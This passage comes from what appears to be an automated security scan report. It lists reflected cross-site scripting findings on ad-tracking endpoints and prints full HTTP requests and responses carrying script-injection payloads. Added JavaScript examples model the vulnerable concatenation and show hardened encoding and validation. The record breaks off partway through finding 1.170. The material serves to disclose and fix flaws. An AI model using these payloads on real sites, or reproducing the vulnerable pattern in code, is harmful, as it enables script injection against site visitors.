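The five fmr.js findings above (1.155 through 1.159) are one bug seen through different parameters: a request value is pasted into a JavaScript string literal by plain concatenation, and whichever quote character the template happens to use, the matching quote in the payload ends the literal. The block below is an added example, not ZEDO's code. It rebuilds the zzPat and zzStr lines the way the echoed responses suggest they are built (an assumption), then rebuilds them with the value encoded as a string literal, and executes both versions with a stubbed alert() to show that only the first one runs the injected code. The function names are invented here; the same encoding is the fix for the qs= fragment of the p9.src beacon URL in 1.157.

```javascript
// Added example, not ZEDO's code: a model of how fmr.js builds the zzPat/zzStr
// lines and how to build them safely. Assumption: the server concatenates the
// raw q (or $) value into those lines, as the echoed responses suggest; the
// function names here are invented.

// Encode a value as a JavaScript string literal. JSON.stringify escapes quotes,
// backslashes, newlines and control characters; the extra replacements keep the
// literal safe inside an inline <script> block and in engines that predate the
// ES2019 rule allowing U+2028/U+2029 inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Vulnerable construction, reproducing the pattern seen in the report:
// a single-quoted literal for zzPat and a double-quoted one for zzStr.
function renderVulnerable(q) {
  return "var zzSection=1;var zzPat='" + q + "';var zzCustom='';\n" +
         'var zzStr="q=' + q + ';z="+Math.random();';
}

// Hardened construction: the user-controlled value can only ever be the
// contents of a string literal, whichever quote style the template used.
function renderHardened(q) {
  return 'var zzSection=1;var zzPat=' + jsStringLiteral(q) + ";var zzCustom='';\n" +
         'var zzStr=' + jsStringLiteral('q=' + q + ';z=') + '+Math.random();';
}

// Run a generated script with a stubbed alert() and a fixed Math.random(),
// and report whether alert fired and what the two variables ended up holding.
function runGenerated(script) {
  const alerts = [];
  const fakeAlert = function (x) { alerts.push(x); };
  const fakeMath = { random: function () { return 0.5; } };
  let out;
  try {
    const fn = new Function('alert', 'Math',
      script + '\nreturn { zzPat: zzPat, zzStr: zzStr };');
    out = fn(fakeAlert, fakeMath);
  } catch (e) {
    return { alerted: alerts.length > 0, error: String(e) };
  }
  return { alerted: alerts.length > 0, zzPat: out.zzPat, zzStr: out.zzStr };
}

// Constructed inputs: the two payloads from findings 1.158 and 1.159.
const PAYLOAD_SINGLE = "5c98b';alert(1)//05ebf60c76b";
const PAYLOAD_DOUBLE = '4a24e";alert(1)//78bd77ef7b2';

// Summarise both renderings for one payload.
function compare(q) {
  return {
    vulnerable: runGenerated(renderVulnerable(q)),
    hardened: runGenerated(renderHardened(q)),
  };
}
```

Running compare(PAYLOAD_SINGLE) shows the vulnerable script firing alert and leaving zzPat truncated to 5c98b, while the hardened script fires nothing and stores the full payload as an ordinary string; compare(PAYLOAD_DOUBLE) shows the same through the zzStr line. Escaping only one quote character would not be enough here, which is why the example encodes the whole value rather than patching the template.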

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the callback request parameter is used as the JSONP callback name and is copied unmodified into the response body, which consists only of the call callback(null);. The payload 15067<script>alert(1)</script>559c6769366 was appended to the legitimate callback name jsonp1297647336859 and was echoed unmodified in the application's response. Because the response is served with Content-type: text/html rather than a JavaScript media type, a browser that navigates directly to the URL renders the body as HTML and executes the injected script element.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp129764733685915067<script>alert(1)</script>559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:07 GMT
Server: lighttpd/1.4.19
Content-Length: 66

jsonp129764733685915067<script>alert(1)</script>559c6769366(null);

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the type request parameter is copied unmodified into an error message when it is not one of the recognised types. The payload bdd5a<script>alert(1)</script>01f935525e0 was appended to the value init and was echoed unmodified in the application's response. As in 1.160, the error text is served with Content-type: text/html, so the reflected script element is executed when the URL is opened directly.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp1297647336859&type=initbdd5a<script>alert(1)</script>01f935525e0&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:08 GMT
Server: lighttpd/1.4.19
Content-Length: 75

Error: type "initbdd5a<script>alert(1)</script>01f935525e0" not recognized.
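Findings 1.160 and 1.161 share two root causes: the endpoint reflects the callback name and the unrecognised type value without validation, and it labels a JavaScript (or plain-text error) response as text/html. The following is an added example, not Inskin Media's code: a minimal model of the endpoint as the report shows it behaving, next to a hardened version that accepts only a dotted identifier as the callback, never reflects an unknown type, and serves the body as JavaScript with sniffing disabled. The function names, the KNOWN_TYPES set and the assumption that init is the only valid type are all invented for the example.

```javascript
// Added example, not Inskin Media's code: a model of a JSONP tracking endpoint
// like track.php, first as the report shows it behaving, then hardened.
// Assumed: 'init' is the only valid type (it is the only one seen in the report).
const KNOWN_TYPES = new Set(['init']);

// Mirrors the observed behaviour: callback and type are echoed raw, and the
// body is labelled text/html, so a browser visiting the URL renders it as HTML.
function handleTrackVulnerable(params) {
  const headers = { 'Content-Type': 'text/html' };
  if (!KNOWN_TYPES.has(params.type)) {
    return { status: 200, headers, body: 'Error: type "' + params.type + '" not recognized.' };
  }
  return { status: 200, headers, body: params.callback + '(null);' };
}

// A JSONP callback may only be a dotted JavaScript identifier (e.g. jQuery.cb1).
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Hardened: reject bad input without echoing it, serve JavaScript as JavaScript,
// and tell the browser not to sniff it into HTML. Anything passed to the
// callback goes through JSON.stringify so it cannot break out of the call either.
function handleTrackHardened(params) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
  };
  if (!isValidCallback(params.callback)) {
    return { status: 400, headers, body: '/* invalid callback */' };
  }
  if (!KNOWN_TYPES.has(params.type)) {
    // The unknown value is not reflected; the client gets a fixed error code.
    const err = JSON.stringify({ error: 'unknown_type' });
    return { status: 400, headers, body: params.callback + '(' + err + ');' };
  }
  return { status: 200, headers, body: params.callback + '(null);' };
}

// Constructed inputs: the two payloads from findings 1.160 and 1.161.
const PAYLOAD_CALLBACK = 'jsonp129764733685915067<script>alert(1)</script>559c6769366';
const PAYLOAD_TYPE = 'initbdd5a<script>alert(1)</script>01f935525e0';
```

With the report's callback payload, handleTrackVulnerable returns the injected markup under text/html while handleTrackHardened answers 400 with a fixed body; with the type payload the hardened handler still calls the legitimate callback, but with a constant error object instead of the attacker's string. The nosniff header matters even for the valid path: without it, some browsers will still treat a script response as HTML when it is opened directly.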

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 2 is copied into the double-quoted HREF attribute of the click-through anchor that the ad server returns. The payload 6a742"><script>alert(1)</script>37cfb750f3 was submitted in REST URL parameter 2 and was echoed unmodified in the application's response: the "> closes the attribute and the A tag, and the script element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6a742"><script>alert(1)</script>37cfb750f3/2010DM/1783083111/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 3 is copied into the same double-quoted HREF attribute of the click-through anchor. The payload fd26f"><script>alert(1)</script>86e816e9a4d was submitted in REST URL parameter 3 and was echoed unmodified in the application's response, closing the attribute and the tag exactly as in 1.162.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/11355486136@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfd26f"><script>alert(1)</script>86e816e9a4d/114049446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11355486136@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e1a"><script>alert(1)</script>f19825639fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11355486136@x2349e1a"><script>alert(1)</script>f19825639fa?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1477922344/x2349e1a"><script>alert(1)</script>f19825639fa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a745b"><script>alert(1)</script>050408e5f6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa745b"><script>alert(1)</script>050408e5f6b/2010DM/1959021525/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e244"><script>alert(1)</script>5324050ac37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/11473307965@x23?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1e244"><script>alert(1)</script>5324050ac37/1110964581/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11473307965@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1f2c"><script>alert(1)</script>d093f0af15f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11473307965@x23f1f2c"><script>alert(1)</script>d093f0af15f?USNetwork/RS_SELL_2011Q1_TF_CT_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aOmNvBpGrwptrC5qvh3Wmt4AFZcmbMK0G3VXGYVXVZbNnEvV3FMPVFbAUP72Qq32SV3MQdJs0dBsWmnu2sB5XrUZaVmPw4mQ9R6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvuWoguA/2401336/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; id=914803576615380; session=1297647384|1297647384; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1112750384/x23f1f2c"><script>alert(1)</script>d093f0af15f/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571f4"><script>alert(1)</script>cd3219b027d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM571f4"><script>alert(1)</script>cd3219b027d/2010DM/117581210/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4e6"><script>alert(1)</script>518d6ce49b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/11781759243@x23?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbc4e6"><script>alert(1)</script>518d6ce49b7/1996747534/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11781759243@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d6c"><script>alert(1)</script>77e70440218 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11781759243@x2336d6c"><script>alert(1)</script>77e70440218?USNetwork/ATTW_1H_11Q1_TMP_RON1HCPC_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
